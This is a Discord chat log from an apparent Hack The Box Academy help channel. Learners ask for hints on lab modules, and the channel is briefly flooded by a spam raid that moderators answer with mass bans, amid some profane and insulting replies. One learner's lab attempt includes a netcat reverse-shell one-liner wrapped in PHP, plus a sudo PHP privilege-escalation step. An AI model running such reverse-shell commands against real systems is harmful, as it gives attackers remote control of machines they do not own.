[16:33:45:401] [2271:2272] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized
[16:33:45:421] [2271:2272] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state
[16:33:45:421] [2271:2272] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state
[16:34:00:436] [2271:2272] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[16:34:00:436] [2271:2272] [ERROR][com.freerdp.core] - failed to connect to 10.129.2.211

Is a VPN key provided? Can you try connected from a personal VM?

Yes there is a key, I will give it a try

Module: Cracking into HTB
Web Requests
Section: Post Method

I need a little help here, could somebody help me real quick?
Following content contains Spoilers:
||My current attempt is login in as guest:guest, grap the cookie, modify it from guest_a96f9b7abd03b4dfe829 to admin_a96f9b7abd03b4dfe829 -> encrypt it and modify my next get request with Cookie: PHPSESSID=admin_a96f9b7abd03b4dfe829 (encrypted). Is this the wrong attempt? Im not sure if the first GET request has to be to login.php or admin/dashboard.php||

I tried from a personal VM using the openvpn key, but I cannot connect. I read in the support-academy channel that some members are having a connection problem as well

Would you open a support ticket?

++support

yes, thanks for the link to the link of the support portal and also for your help👍

No problem. Best of luck!

Hey, in GETTING STARTED - Privilege Escalation
in the second question I can see the content of id_rsa but cant change permissions (chmod), I'm stuck here. How should I proceed?

so you are current in that root/.ssh/ directory

ls -la will give you a better idea of the directory permissions

Hey there.

What module do you recommend I do? Preferably fundamental level because I'm a beginner. I've finished the Windows, Linux fundamentals and Learning process modules.

Sounds like you only have a few choices left, maybe Web Requests

Hey guys...I'm kinda new to Linux and am having trouble with "Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option)" not necessarily looking for the answer...just a point in the right direction. I've tried all the switches I can think of and nothing is working...Thanks
UPDATE!!!! I figured it out...thanks anyways Very easy actually...just had to read and pay attention

I'm New to doing the Linux Fundamentals right now....Trying to learn Linux is fun though

so i'm doing linux fundamentals and got stuck on How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only) in Filter Contents

Determine what user the ProFTPd server is running under. Submit the username as the answer. need help with this one too

Ok, thanks @tranquil carbon & @nocturne heart.

Hello, can anyone help me. just need a guide, not the answer
Module : sql injection
Page 14 : Reading Files
question : We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.

hey did you get the answer to your question? because I'm struggling with this one also

i was trying to ||login with guest and then refreshing the page to remove cookies and replace login form data with sql injection, just getting failed login||

ok, nvm, got it

got it..thx for no one helping

Hey can anyone DM about Getting Started/Public Exploits. I got the exploit but got problems setting it up.

Hi, i'm stuck on "Getting started" -> "Privilege Escalation"
I have run different scripts but I don't know what to look for, I can't read the file in user/flag.txt
I used the "LinPEAS - Linux Privilege Escalation Awesome Script" but I can't find the password of user2

@opaque elm try checking what privileges you have on the box. Execute the command man sudo and search for how to list privileges. 👌🏼

Anyone here have experience with tmux and/or tmux logging?

If so, how do I run this command at the bottom of the tmux.config?

(I think you should put a spoiler thing after "but when I try"..)

The first one can be done with ||some commands shown in the module for filtering and ss https://www.howtogeek.com/681468/how-to-use-the-ss-command-on-linux/ ||
As for the second one, I recommend ||the ps command, and again, other commands for filtering ||

I have this for learning process but its wrong and i cant find the wording that is correct: ||the enormous difference, how much it makes, if we increase our performance by 1% per day||

can anyone help me with this

Hey there.
I'm on the Getting Started module, Section Scanning Services.

I've used the ||smbclient \\\\[IPADDRESS]\\users|| command and entered the users password. Then this comes up, as expected (Photo).
I try doing the ||ls || command but that doesn't work.. This error comes up (Photo).
How do I fix this, please?
Any help appreciated.

The HTB Question is; || Access the SMB share folder called 'flag' and submit the contents of the flag.txt file.||

Sorry, I'm not sure if this is where I can post this but I'm starting to struggle and need some advice

so more and more in the windows fundamentals course, it doesn't teach me the commands necessary to answer the questions, and I end up just googling the answers. This isn't teaching me anything and I must be missing something.

Currently my example is the "windows security" section, wanting me to find the SID of a user. they only teach you how to get your sid (whoami /user)
I had to google the command effectively shutting my brain off just to copy / paste.

Has anyone else had this issue and been able to learn rather than momentarily memorize? I guess I should have already known the command from somewhere else?

I'll gladly take any studying tips and such because I am notoriously bad at studying

@smoky shadow This definitely happens a lot -- very common mentality to slip into

The trick is to notice yourself slipping into this "I need to get the flag" mentality and focus on the puzzle/task at hand instead.

Fair point. thank you 🙂

ofc. it still happens to me sometimes too 😜

besides to what @nocturne heart said, it is about learning and this requires some times that you need to search for it (no matter where). Please keep in mind that we're not a database of "everything". We teach you the concepts that will help you in the future more than just replicating shown steps. If you found the answer on your own, then you know what you had to search for.

Very true, I knew what to look for and found the command pretty quick. lesson learned 😁

take a close look at your command and try to understand what you're doing

i guess if you understand your command properly you don't want to run that 😉

quick reminder here about the server rules:
#rules message
please pay attention especially for rule #8

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

hyperspammer.com - Discord raiding as hyper as never before

@fading crypt@merry egret@final spire@novel leaf@hexed kindle@deft hazel@elfin adder@cursive pilot@bleak flame@soft trout@storm lynx@rustic sage@low plaza@raw stump@severe coral@azure lintel@visual cedar@frozen kernel@keen kernel@outer atlas@junior anvil@gritty hatch@vital moat@unborn oriole@sour valley@abstract canopy@dense timber@viscid jewel@lean tangle@broken hamlet@hollow agate@warped spoke@elfin dagger@abstract lion@warm locust@magic mantle@jade quarry@crude python@twilit geode@minor summit@icy flare@orchid swan@fair crow@novel plover@native lynx@surreal swan@hollow onyx@raven sleet@autumn oar@fluid sentinel@calm scaffold@ornate stream@indigo dock@wary inlet@inner oar@frail flare@safe hatch@worldly garnet@jade narwhal@half otter@ripe basalt@long storm@modest light@worn swift@blazing spade@native patio@sonic osprey@signal kelp@upper wind@remote oasis@dry oyster@atomic wagon@rustic sage@desert lichen@jovial kernel@warm gate@sour holly@snow wave@rugged cliff@clear condor

@rustic sage@clear palm@devout locust@onyx tendon@torpid prairie@mental hill@red raft@scenic junco@final plover@distant rune@mystic tulip@verbal plaza@rich ridge@rustic sage@lost plaza@stiff minnow@broken hamlet@oblique verge@light jetty@vague quiver@rustic sage@candid bough@foggy dune@elfin adder@next cradle@cunning saffron@small lodge@daring mango@neat mountain@coarse imp@valid ginkgo@normal tide@signal dove@icy grove@sick pine@ionic sonnet@boreal tide@opaque vigil@lament void@median coyote@sacred patio@rustic sage@ornate nimbus@charred hollow@celest willow@magic birch@sullen hedge@blissful horizon@carmine mango@proud jasper@spiral basalt@naive nexus@naive field@late hare@pastel jackal@rustic sage@woven mesa@regal pulsar@barren mason@cyan shuttle@warped sapphire@rustic sage@rustic sage@magic glen@thorn vapor@stuck quartz@somber jacinth@echo acorn@quartz cradle@rustic sage@rugged jackal@untold schooner@oak bobcat@marsh iris@candid nimbus@flint hinge@humble heart@rustic sage@pearl scarab@astral atlas

@jagged tulip@arctic tartan@wind isle@grim shale@lavish ember@green plume@ripe cloud@vernal stag@rustic sage@dusky nexus@vale orchid@keen rapids@restive drift@rustic sage@hushed fjord@gusty dove@still hemlock@grand bobcat@unkempt rivet@dreamy peak@static belfry@junior plover@dreamy jacinth@mellow gulch@ruby moss@tranquil tundra@marsh thicket@west solstice@night osprey@fringe thorn@sonic ravine@final basin@elfin light@exotic isle@late lark@red hazel@flint stratus@formal notch@light moss@maiden axle@stark condor@craggy rapids@mint stump@raven storm@lyric girder@acoustic quail@manic gazelle@left locust@fleet whale@south niche@drifting acorn@vale root@edgy dagger@desert glade@tender remnant@nimble ember@elder oyster@hoary tapir@digital sundial@alpine vessel@stuck steppe@long gull@silent pulsar@drowsy dawn@remote surge@rustic sage@hidden dawn@fickle summit@shell lake@haughty crystal@gentle slate@raven beacon@coral elm@rigid vigil@kind zodiac@chilly glacier@delicate hinge@timber nymph@tidal hamlet@abstract tapir

@obtuse turtle@shrewd sand@trail sentinel@analog hearth@foggy panther@fringe lake@rustic sage@granite pivot@eager swallow@shadow prawn@supple acorn@ripe anchor@rain pasture@delicate slate@rustic sage@spiral widget@hollow python@prisma flare@quasi ore@near maple@noble belfry@rustic sage@drifting rain@round geyser@near nacelle@topaz dune@naive ibex@dark elbow@slender hinge@restive siren@empty dew@lime sierra@barren notch@ornate topaz@random estuary@sour dust@strong venture@deep torrent@raven sun@shut wave@grand anvil@jovial tendon@eternal nimbus@shadow yarrow@young hinge@tough crystal@queen barn@boreal pumice@pallid viper@rustic sage@sick pike@undone herald@vestal crow@final anvil@rapid raven@livid swallow@next basalt@torn pilot@stone basin@crisp sage@modest ferry@vast solar@wet river@narrow halo@indigo dock@rustic sage@final stump@limber wind@queen hatch@faint trellis@velvet token@lyric lion@hollow osprey@nimble plume@hard lark@pliant forum@quaint mural@royal void@void mountain@rustic sage

@obtuse latch@obsidian prawn@keen crypt@ashen ferry@quiet grove@prime nimbus@zealous root@spark bobcat@mellow shuttle@flint stag@lusty flume@digital nest@vast echo@digital relic@cyan iris@onyx sleet@mortal prawn@timid anvil@glass gorge@autumn pewter@slim pagoda@halcyon kraken@soft trout@rustic sage@simple meadow@runic wigeon@scarlet hill@brittle timber@acoustic vector@jaunty drift@nova warren@red nexus@smoky night@surreal swan@surreal gale@haughty bluff@last adder@dusty ivy@reef spruce@silent cargo@elder moon@granite venture@empty crest@winged hedge@winged wadi@hardy walrus@rustic sage@ripe orchid@marble knot@autumn oar@devout mango@dawn jetty@rustic sage@wintry bolt@ancient kindle@idle patio@rustic sage@ebon pine@jovial dust@naive plaza@dark plume@last salmon@uncut grove@orchid moth@fallow creek@hearty skiff@subtle musk@raven condor@proud quartz@thorn violet@lyric thorn@dry quiver@wind valve@formal compass@manic viper@warped elm@fiery oasis@sharp ingot@long tiger@wary heron

@heavy bay@blazing urchin@grand glade@modern berry@rotund kraken@rustic sage@tired plume@rustic sage@hardy flax@viscid wadi@rustic sage@full imp@daring flax@grave sleet@naive ermine@noble token@pine galleon@fair mulch@lusty echo@dense bone@vagrant inlet@fathom spruce@young thicket@tidal marten@shadow raft@spark halo@short yoke@olive ruin@still temple@blazing rivet@dull furnace@molten shale@rustic sage@nimble pecan@proven wing@harsh basin@round ginkgo@hoary magnet@green holly@rain otter@rustic sage@kindred wigeon@rustic sage@rustic sage@plain ravine@blazing forum@rocky sky@rustic sage@tepid otter@slate field@noble vine@brave gale@cyan knoll@indigo fox@old ether@tardy kelp@zinc badger@icy prairie@shadow pond@junior anvil@flint charm@minor canopy@wicked swan@ancient flicker@median hull@candid perch@turbid bolt@river sinew@river thicket@rustic sage@broken coral@azure grove@drowsy wyvern@neat snow@dapper jacinth@humble bison@latent orbit@haughty gulch@fallen narwhal@fleet shale

And there we go

bruh

@spice badge@bright wind@humble burrow@versed sable@silk lion@fluid axle@stiff maple@quaint matrix@rustic sage@kind vector@tropic wolf@inner pawn@zinc thunder@carmine peak@wintry gorge@zealous lichen@main grove@heavy ermine@half hatch@rustic sage@rustic sage@quaint silo@small berry@lavish lion@cursive lake@slim vector@lean acorn@marble lodge@kindred tide@lost valve@prime fulcrum@finite edge@zenith ivy@lime arrow@hushed pelican@naive wasp@spark swallow@wintry sigil@flat pulsar@brazen hearth@lunar cipher@west python@icy patio@serene vault@rustic sage@craggy robin@quartz mango@quick wagon@lusty lichen@tulip oar@lyric spruce@frosty trench@hasty hill@bright sigil@craggy dirge@tight jetty@static sail@tacit tinsel@spiral zealot@abstract yew@shell lance@fossil crystal@raw flint@glad torrent@rustic sage@coral fjord@twin kite@warm citrus@rustic sage@weary thunder@cyan pike@cyan prairie@green shale@somber shard@floral palm@noble temple@blissful leaf@grave lynx@young cedar@rustic sage

oh my

hyperspammer.com - Discord raiding as hyper as never before

@fringe oxide@fresh pulsar@plucky locust@tender sail@worldly lake@sharp sigil@tawdry dragon@dry oyster@neon scaffold@unkempt siren@flat sigil@sweet umbra@cobalt karma@open dock@rustic sage@noble orchid@rustic sorrel@humble jasper@balmy frost@quartz folio@hearty ridge@mossy hamlet@frozen solar@rapid bolt@silk raptor@rustic sage@small scaffold@covert shore@torpid condor@light crater@obsidian canopy@silver stirrup@white storm@echo dome@trim lodge@ancient creek@strange dock@rustic sage@spice crater@glossy gazelle@winged tundra@rustic sage@red orbit@drowsy schooner@fair sigil@rustic sage@pliant jetty@lean ember@strange kraken@red oasis@civic oasis@pallid umbra@digital sleet@trim grail@slow lava@analog acorn@clear bramble@long seal@lost pecan@lament sorrel@half copper@white girder@minor gyro@inner gust@halcyon halo@misty sedge@lyric inlet@open sleet@frigid knoll@toxic swallow@karmic prairie@ashen pivot@wicked dock@tall dragon@pine mango@tacit folio@molten pasture@mint temple@amber nest@hot mantle

what

++Rm @signal badge 1w spam

Dr.Wario has been banned for a duration of 1w for spam

++slowmode 60

Set the slowmode delay in this fundamental-modules to 60 seconds!

stop

What the fug

Wtf

what the fuck

Chill

what

hyperspammer.com - Discord raiding as hyper as never before

sigh

++rm 1w @tall sable

hyperspammer.com - Discord raiding as hyper as never before

What the

++rm @latent moon 1w spam

fucjk you dumb bitch

++rm @thorn cloak 1w spam

++tempban 1w 840753823847940138

3zlu has been banned for a duration of 1w for spam

wtf

wtf

++rm @prime tusk 1w spam

lock the chat

Poor guys

!,',.сашими,!'.<,3!'',i! has been banned for a duration of 1w for spam

wtf

lol

Kizord has been banned for a duration of 1w for spam

darn

rip

Bruh

wtf is this

What is going on

you got this mods

lmfao

++rm @rustic sage 1w s[a,

Dickheads

coldheart has been banned for a duration of 1w for s[a,

dafuck

++rm @red obsidian 1w spam

You cannot ban another staff member.

yikes

++rm @rustic sage 1w spam

why

https://tenor.com/view/milk-and-mocha-dance-dancing-music-gif-12302383

++rm @rustic sage 1w spam

some fuck going on here

ICEboy114 has been banned for a duration of 1w for spam

holy shit

++rm @rustic sage 1w spam

Hack the discord?

thats one way to advertise

lmao

DaHoodaimlock has been banned for a duration of 1w for spam

++rm @rustic sage 1w spam

Spambots, woohoo.

are has been banned for a duration of 1w for spam

what the fuck

o.O

++rm @fierce warren 1w spam

LMAO rip

++rm @ruby reef 1w spam

YOU GOT HACKED LMA

++rm @thorny hornet 1w spam

++Rm @winter dust 1w spam

oh they're here too

dumb ass

wait guys don't send messages so it's easier for the mods to ban them

<@&583628976736567296> ????

@thorny hornet has their DM's disabled!

++rm @rustic sage 1w spam

What's going???

++rm @rustic sage 1w spam

DarkBlades^^︻デ═一 has been banned for a duration of 1w for spam

Hazz has been banned for a duration of 1w for spam

++rm @rustic sage 1w spam

Lol

++rm 531493543177617418 raid

Invalid time option entered!

++rm @rustic sage 1w spam

RETARDS

You might want to lock down the chat

Spulry has been banned for a duration of 1w for spam

bruh moment

++rm @rustic sage 1w spam

Loux has been banned for a duration of 1w for spam

People are “raiding”

Just remove everyones permissions from this channel

++rm @jade geode 1w spam

Mint has been banned for a duration of 1w for spam

Arthy has been banned for a duration of 1w for spam

renluvr has been banned for a duration of 1w for spam

Lock the channel

Spam attack

Did I win a prize?

NetunoFDS has been banned for a duration of 1w for spam

++rm 1w 31493543177617418 raid

why spam in this channel of all channels

KiraaPvp has been banned for a duration of 1w for spam

Lock the channel!

Evie Rivera has been banned for a duration of 1w for spam

++rm 398184367463071754 1w raid

chexedy has been banned for a duration of 1w for raid

fucking spam skids

++rm @hot cave 1w spam

Fire has been banned for a duration of 1w for spam

What on fucks name just happened here

++rm 531493543177617418 1w raid

Marija Serifovic has been banned for a duration of 1w for raid

++rm @rustic sage 1w spam

raiding servers only give people 1 week? it should be permanent

Enemy Spotted has been banned for a duration of 1w for spam

++rm 368334960177840130 1w raid

Wyvern has been banned for a duration of 1w for raid

++rm @fathom jackal spam

i assume its a temp solution and they'll just do it later perm

what's going on

i dont disagree, its just temp. they're most likely burners

a raid

i think people are getting muted

++rm 739940334842282054 1w raid

++rm @rustic sage 1w spam

Naftaly has been banned for a duration of 1w for spam

i guess this was one of the only insecure channels then

++rm 280399001751257089 1w raid

Nutty has been banned for a duration of 1w for raid

spaming members im guessing?

++rm @rustic sage 1w spam

force phone verification before being able to chat 👀

Pure has been banned for a duration of 1w for spam

The same kind of multi-user mention spam happened like 10 minutes ago in TryHackMe's discord too

++rm 701587690184900628 1w raid

++rm 701587690184900628 1w raid

++rm @tall sable spam

This is why you should never use betterdiscord peeps

What in the world

++rm @fathom jackal 1w raid

++rm @rustic sage 1w spam

SV has been banned for a duration of 1w for spam

++rm @rustic sage 1w spam

Dandi has been banned for a duration of 1w for spam

++rm @cosmic bane 1w spam

++rm @rustic sage 1w spam

Just A Nervous Emoji has been banned for a duration of 1w for spam

and here i was peacefully going through the fundamental modules

lmao poor krazey

++rm @rustic sage 1w spam

Sachayoj has been banned for a duration of 1w for spam

I'm just gonna leave the ban requests for when the other admins get back and wonder wtf happened

++rm 701587690184900628 raid

++leftban 701587690184900628 1w raid

Banned user rah for 1w raid

yeah this is nice

++rm @olive citrus 1w spam

lol. Good idea.

We just had a raid from around 75~ users not too long ago as well.
Ya'll should invest in an automod bot :P

++rm @rustic sage 1w spam

tire has been banned for a duration of 1w for spam

@viscid jewel Yeah 10 min ago on TryHackMe too

Wow... Why tf do people do this sh't?

?

++rm @rustic sage 1w spam

Stuck at High Plat Sadge has been banned for a duration of 1w for spam

++rm @rustic sage 1w spam

Add verification to prevent it from happening again. Also try to add a command that locks the chat to minimize the spam in chat rather than using slow mode.

nkl has been banned for a duration of 1w for spam

++rm @rustic sage 1w spam

revoltzz has been banned for a duration of 1w for spam

++rm @ancient nymph 1w spam

Bluekiller9433 has been banned for a duration of 1w for spam

++rm @cosmic bane 1w spam

++rm @tall sable 1w spam

++rm @raven niche 1w spam

What happened here

++rm @tardy forge 1w spam

papix has been banned for a duration of 1w for spam

++rm @rustic sage 1w spam

cynmorisdom has been banned for a duration of 1w for spam

++rm @hexed ridge 1w spam

Will everyone PLEASE simmer down with the suggestions so that mods can do their job peacefully?

What's going on here?

raid/spam

++rm @tranquil shore 1w spam

leonn has been banned for a duration of 1w for spam

++rm @tranquil shore 1w spam

++rm @crude gulch 1w spam

Hex has been banned for a duration of 1w for spam

++rm @raven niche 1w spam

alternatively just don't comment on the event in chat

++leftban 303592851562954752 1w raid

Banned user Dr. Grey for 1w raid

raids aren't uncommon or new happenings

++rm @cosmic bane 1w spam

++leftban 661578708955430974 1w raid

Banned user leonn for 1w raid

++rm @lapis basalt 1w spam

Solo has been banned for a duration of 1w for spam

++ban 285139757959217162 1w raid

User Has DM's Disabled!

think thats all

👀

++leftban 594212924491563028 1w raid

Banned user รล∂в๏y for 1w raid

Is there a way to check the age of these accts? Since they do indeed seem to be some burners, couldnt you guys restrict chat to accts that have joined for 10 minutes or something, and then if you see a sudden mass influx, flag the accts?

yall know if these are fresh or hacked accs? i see some of them have nitro or linked accounts, makes me curious

@raven condor They are mad, that they didnt get into HtB INV Challenge 😛

yes, you can get account age from the snowflake

They appear like they could be just compromised

we just havent had the need

literally a $1 paywall would prevent most of this

fair

that's what i was thinking, damn :(

This one too

and this one 743562825661677709

Damn

THM and HTB both got raided

Im just bouncin thoughts off the walls. My other thought was that if they're newly created accts, hence checking age, you could flag them as soon as they appear...though taht might be complicated for the bot

my custom bot (not an ad, it's private lmao) displays account age in the join log

although if theyre hacked accounts that wont do shit

no but you could require them to verify with a DM

John was typing

as soon as a user joins

maybe with a captcha

this is best by far

i've been in servers where that was a raid prevention tool. you had to provide a captcha completion essentially

we have that too

if its the same verification process for all members, i'd imagine it'd be pretty easy to bypass with a selfbot

we just(mostly) stop everyone with the verification system

does discord even need that much verification

no ones ever breached the containment zone 😛

actually just for fun i wanna see if i can try the captcha thing now lol

tf is going on

last time i checked you could just make an account from the browser and it didnt care

#general guys

sorry lol

and a large amount of our members 😦

I would not pay $1

So many notifications

#📣-announcements

i be too poor for a 1 doll hair fee

That was a really terrible raid

Ngl

hey guys i am trying to get the flag.txt in htb academy =>getting started module ->public exploits chapter; i identified the exploit but can't figure the path; anyone can help?

Yea

@neon shard sent ya

@neon shard you there?

Hello. In getting started - Knowledge Check I achieved to run || LinEnum.sh that gave me the result in the print but I cant "echo .... " to perform reverse shell, says permission denied , I don't understand why. ||
Can anyone help?

what do you want to echo?

hmm not sure about that one specifically, if the module is trying to teach something in particular

but a great website for finding examples on how to exploit misconfigurations such as this is https://gtfobins.github.io/

@pulsar elm i might be wrong, but it looks like ur not using “sudo”, pm if you want me to explain a lil more

When I uso sudo it asks for pw

which doesn’t make sense since it says I can use sudo without pw

u have sudo perms with “/usr/bin/php” not with tee

check ur pms in sec @pulsar elm

"Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag."
How do I do this, please?
I've tried some stuff and googled for help but I can't seem to get the correct answer.
Any help appreciated. 🙂

(Module - Getting Started, Section Web enumeration..)

hey guys i am trying to get the flag.txt in htb academy =>getting started module ->public exploits chapter; i identified the exploit but can't figure the path; anyone can help?

still need help

++academy

Hi mates im stucked in Getting started exactly in the last step " After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag."
I know i can use this

User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php

But I don't know how use this to upgrade to root i try make fake .php to try launch one shell or rever shell
but I can only do a rever shell with my current user. Thanks 🙂

Remember that you can run a command with sudo, you already mention, try to get something inside that command that can do an action inside the OS that you want

Yes i know, i try sudo -u <user> /usr/bin/php <personalscrip.php> and in this command diferent scripts like
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bin/bash -i 2>&1|nc <lhost> <port> >/tmp/f"); ?>
echo '#!/bin/bash' > shell.sh
echo '<?php exec("sudo shell.sh"); ?>' > launcher.php
sudo -u www-data /usr/bin/php launcher.php

Surely it would be silly but I can't see it. Thanks a lot

I solved it, I am an idiot, it is clear that looking with perspective will always be key

hi everyone, I'm stuck at the File inclusion module's skill assessment. I tried different approaches but none worked. Can someone please give a hint?

Hi! I'm stucked at Linux Fundamentals Working with Web Services at first question i search for it a lot, but i dunno what to do, the module dont rly show the way how to do it so pls help me im under the water

Yeah, the module doesn't really show you how to solve that questions, but a simple search in a browser will take you out of the water

i surf on the net almost 2 hours and i tried almost everything i think and its incorrect

strange, well, here's an article that will help you, for it it was literally the first result ||https://www.how2shout.com/how-to/how-to-install-and-use-node-js-http-server-web-server-via-npm.html||

yeas

Please don't post spoilers @jaunty vortexas it destroys the purpose for others taking the same module.

@jaunty vortex If you want to post that image, please blur or scribble over the answers.

I wouldn't mark it as a spoiler as it's still giving answers away for someone that is new.

They can just click on "spoiler" to show the answers. Once you cover those answers, you're right to post 🙂

can someone explain these questions by dm to me?

why do someone need to explain if you already have the answers?

How the heck did they get a login in this? Can someone explain how they got the bob account.

using credentials

Hello do i need network adapter that supports monitoring mode to use nmap ?

Nope.

thanks 😄

You're welcome.

because I tried one by one, and I didn't understand exactly

Hello everyone, I have a question concerning the security of the system i work from. is it prefferable always to use when i compleate modules?

use VM**

Hey everyone.
May I get assistance on this question, please?
SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.
Any help is appreciated.

Nevermind, I've got it! Thanks.

hi guys. someone can help with the correct answer for question of diference between those two numbers?

here is the question.
What is the difference between the two numbers of the learning progress mentioned above?
hint 37.7 - 1.00
(1.00)365 = 1.00
(1.01)365 = 37.7
plz give answer???

done thanks

Hello, I'm stuck at
Module: Cracking into HTB
Web Requests
Section: Post Method

I've logged in as admin modifying the cookies as indicated. But I do not know what to enter as a response, admin_(cookie) does not work

Ok I've have it

Why is my answer wrong?

Did you try doing ||apparmor.service?||

I'm stuck on the last question (Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt') in Getting Started Module, Section Privilege escalation..

So I've created a ssh key using the following command(s);
||touch id_rsa
chmod 777 id_rsa||

So then I ssh using the key ||- ssh user1@[IP] -i id_rsa||

All that works with no errors.

Once connected to user1, I cd'ed to /home using the cd .. command. Then I needed to get into user2. So I did ||sudo -u user2 /bin/bash.|| That's successful.
Then I went into the /root directory using the|| cd /root|| command and then I'm left with the file I want. I thought because I now have the ssh key with full perms when I do|| cat flag.txt|| I would get the context but I don't.

How do I answer this question, please?

Yes, but it didn't work

Hm, One second.

Which module is that?

Linux fundamentals?

Yes

If so which section

18

module 18

the name of the section

Service and Process Management

oh it doesn't let me go back into the module

ok

sorry

https://academy.hackthebox.eu/module/18

but u are on the correct lines

Ok

The Link for the module

oh thanks

it let me view the module by going to the link

lemme see

@earnest zenith dms

Any help will be highly appreciated. 🙂